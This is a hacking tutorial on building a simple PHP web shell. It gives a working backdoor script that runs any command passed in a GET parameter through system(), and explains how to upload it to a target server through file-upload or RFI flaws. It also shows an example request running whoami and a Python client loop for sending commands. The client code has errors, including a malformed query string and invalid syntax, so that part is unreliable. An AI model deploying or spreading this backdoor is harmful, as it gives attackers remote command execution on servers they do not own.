Build A Simple Web shell

Welcome back guys. In today tutorial we are going to learn how we can develop a very basic web shell. Most of you guys know that using a shell like c99 we can gain access to a server.Nearly we an do what ever we want. Also there is a great tool called weevly that allow you to create a PHP shell quickly.Using weevly you can set a password to shell run multiple commands encrypt the script etc. Any way let's start building our script. Hear is the PHP script that we are using to make a backdoor on the server.

<?php
$cmd=$_GET['cmd'];
$out = system($cmd);
echo "<pre>" . $out . "</pre>" ;
?>

Let me explain what is happening hear and how it do the work. Do you know what does system() function ? It takes an command as a argument and run it in the server. Let's assume that we are running following PHP script in a Linux server.

<?php 
echo system('uname -a');
?>

Then it'll run uname -a command on the server and give us the output. If you don't know what this uname command do hear is what it looks like.

GET is a http method which is used to sent data. hear is an example of a GET request.

GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.hacksland.net
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

In PHP script we can fetch data from the get request and do something. $cmd=$_GET['cmd']; Now I hope a all are clear and OK. Let's see how we can use our simple web shell. first thing to do is find a way to upload this shell.php to our target server. For this you can use RFI / file uploading vulnerability etc. Let's assume that you have successfully uploaded the shell and found the uploaded directory. Now you make a GET request to the server like this way.

http://www.targetsite.com/upoads/shel.php?cmd=whoami

Then the PHP script fetch cmd parameter from the GET request and assign it to the cmd variable. Finally it'll execute our command and give the output. We can make a python script for using this shell.

import urllib2
target = raw input("Target with 'http://' > ")
while true:
  command = raw_input("Enter Command > ")
  url = target + "cmd?=" + command
  content = urllib2.urlopen(url).read()
  print content

We assumed that all time requests will be succeeded. How ever this is the basic working of web shell.In next tutorials we are going to see how we can develop this little script.

Thilan Dissanayaka